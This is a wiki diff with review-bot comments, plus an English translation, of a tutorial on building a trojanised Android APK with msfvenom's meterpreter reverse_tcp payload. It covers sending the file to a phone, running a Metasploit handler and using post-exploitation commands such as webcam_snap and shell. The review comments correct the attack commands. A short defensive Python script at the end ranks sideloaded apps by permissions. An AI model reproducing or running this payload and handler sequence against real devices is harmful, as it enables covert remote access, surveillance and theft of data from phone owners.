|
|
| (2 intermediate revisions by the same user not shown) |
| Line 5: |
Line 5: |
| Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan | | Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan |
|
| |
|
| sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk | | sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk |
|
| |
|
| Masukan IP address Kali Linux & Port-nya. | | Masukan IP address Kali Linux & Port-nya. |
|
| |
|
| Setelah perintah di atas di jalankan, maka akan dibuat file app.apk.
| | ==Di sisi smartphone== |
| | |
| | * Copy / kirim file app.apk di Android device. |
| | * Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source". |
|
| |
|
| Copy / kirim file app.apk di Android device. Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source".
| |
|
| |
|
|
| |
|
| ==Di sisi Kali Linux== | | ==Di sisi Kali Linux== |
|
| |
|
| | Di CLI, ketik |
|
| |
|
| | msfconsole |
|
| |
|
| 4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.
| | Jalankan perintah |
| | |
| 5. Once Metasploit starts, type in the following to create a listener:
| |
|
| |
|
| user exploit/multi/handler | | user exploit/multi/handler |
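Review bot: The intro sentence on the new side still reads "Gunakan perintah msfpayload" although the command beneath it now runs msfvenom -p, so the text names a tool the command no longer uses; update the sentence to msfvenom. The positional R is carried over unchanged from the msfpayload form and should be re-checked against msfvenom's own output options. In the trailing context, "user exploit/multi/handler" is identical on both sides; the msfconsole command is "use", so this edit was a chance to correct it.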
| Line 26: |
Line 28: |
| set lhost 192.168.1.16 (enter your Kali IP address) | | set lhost 192.168.1.16 (enter your Kali IP address) |
| set lport 4444 | | set lport 4444 |
| | exploit1 |
|
| |
|
| Then just type exploit to start the handler:
| | ==Attack== |
| | |
| exploit1
| |
| | |
| 6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.
| |
| | |
| 7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.
| |
| | |
| On your Metaploit system you should see this:
| |
| | |
| Reverse TCP session
| |
| | |
| An active session is created and it drops you automatically into a meterpreter prompt.
| |
| | |
| 8. From here your can type “sysinfo” to get information on the device:
| |
| | |
| sysinfo
| |
| | |
| 9. You can see the processes running by typing, “ps”:
| |
| | |
| PS command
| |
| | |
| You can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.
| |
| | |
| Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.
| |
| | |
| Typing “help” at a meterpreter prompt will list all the command that are available.
| |
| | |
| We can also run the shell command that will drop us into a direct Terminal shell if we want:
| |
| | |
| meterpreter > shell
| |
| Process 1 created.
| |
| Channel 1 created.
| |
| ls
| |
| | |
| The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.
| |
| | |
| But if the phone was rooted, I should have been able to access them… Remotely…
| |
| | |
| This should be noted by people who have rooted their phone!
| |
| | |
| And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…
| |
| | |
| Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.
| |
| | |
| What’s next with Android support on Meterpreter?
| |
| | |
| Well, it is not “officially” supported yet, but there is an extension available to Meterpreter that allows several new Android based commands:
| |
| | |
| Pretty amazing stuff!
| |
| | |
| | |
| | |
| | |
| | |
|
| |
|
| | sysinfo - informasi tentang device |
| | ps - linux / android ps command |
| | webcam_list - list webcam yang ada |
| | webcam_snap - snapshot webcam |
| | shell - kalau membutuhkan shell (untuk device yang sudah di root) |
|
| |
|
|
| |
|
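Review bot: "exploit1" on the new side (after set lport 4444) looks like the old revision's screenshot caption rather than a command; the removed text reads "Then just type exploit to start the handler", so the line should be "exploit". The new summary also marks shell as "untuk device yang sudah di root", while the removed walkthrough ran shell on a phone it describes as not rooted. The rewrite also drops the removed paragraph advising users to check the rights an app requests at install; consider keeping a one-line version of that advice.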
Source: http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html
Creating a booby-trapped APK file
Build an APK with remote shell capability using msfvenom (the successor to msfpayload). On Kali Linux, run:
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk
Enter the Kali Linux IP address and port.
On the smartphone side
- Copy / send the app.apk file to the Android device.
- Install the APK; the user will get a warning that "the APK is from an unknown source".
On the Kali Linux side
At the CLI, type
msfconsole
Run the commands
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444
exploit
Attack
sysinfo - information about the device
ps - Linux / Android ps command
webcam_list - list the available webcams
webcam_snap - take a webcam snapshot
shell - if a shell is needed (for a rooted device)
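From the defender's side, the "unknown source" install step above leaves a trace: the package has no trusted store as its installer of record. The following added example (not part of the original page) parses `pm list packages -i -3` output and ranks sideloaded packages by the high-risk permissions they request. The sample listing, package names and permission inventory are constructed, and the trusted-installer and high-risk sets are assumptions.

```python
import re

# Assumption: installers your policy treats as trusted app stores.
TRUSTED_INSTALLERS = {"com.android.vending"}
# Assumption: permissions worth flagging on a sideloaded app (illustrative set).
HIGH_RISK = {
    "android.permission.CAMERA",
    "android.permission.RECORD_AUDIO",
    "android.permission.READ_SMS",
    "android.permission.READ_CONTACTS",
    "android.permission.READ_CALL_LOG",
    "android.permission.ACCESS_FINE_LOCATION",
}
LINE_RE = re.compile(r"^package:(?P<pkg>\S+)\s+installer=(?P<inst>\S+)$")

def parse_installers(listing):
    """Map package -> installer (None if unset) from `pm list packages -i -3`."""
    installers = {}
    for line in listing.splitlines():
        m = LINE_RE.match(line.strip())
        if m:  # skip blank or malformed lines
            inst = m.group("inst")
            installers[m.group("pkg")] = None if inst == "null" else inst
    return installers

def triage(listing, permissions):
    """Return (package, installer, risky_perms) for sideloaded apps, riskiest first."""
    findings = []
    for pkg, inst in parse_installers(listing).items():
        if inst in TRUSTED_INSTALLERS:
            continue
        risky = sorted(HIGH_RISK & set(permissions.get(pkg, ())))
        findings.append((pkg, inst, risky))
    return sorted(findings, key=lambda f: (-len(f[2]), f[0]))

# Constructed sample data, not taken from a real device.
SAMPLE_LISTING = """\
package:com.example.notes  installer=com.android.vending
package:com.example.flashlight  installer=null
package:org.example.game  installer=com.google.android.packageinstaller
"""
SAMPLE_PERMISSIONS = {
    "com.example.notes": ["android.permission.READ_CONTACTS"],
    "com.example.flashlight": ["android.permission.CAMERA"],
    "org.example.game": ["android.permission.CAMERA", "android.permission.READ_SMS",
                         "android.permission.RECORD_AUDIO", "android.permission.INTERNET"],
}

if __name__ == "__main__":
    for pkg, inst, risky in triage(SAMPLE_LISTING, SAMPLE_PERMISSIONS):
        print(f"{pkg}: installer={inst}, high-risk permissions={risky}")
```

The permission inventory would normally be collected per package from the device; here it is supplied as a dictionary so the example runs offline.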
References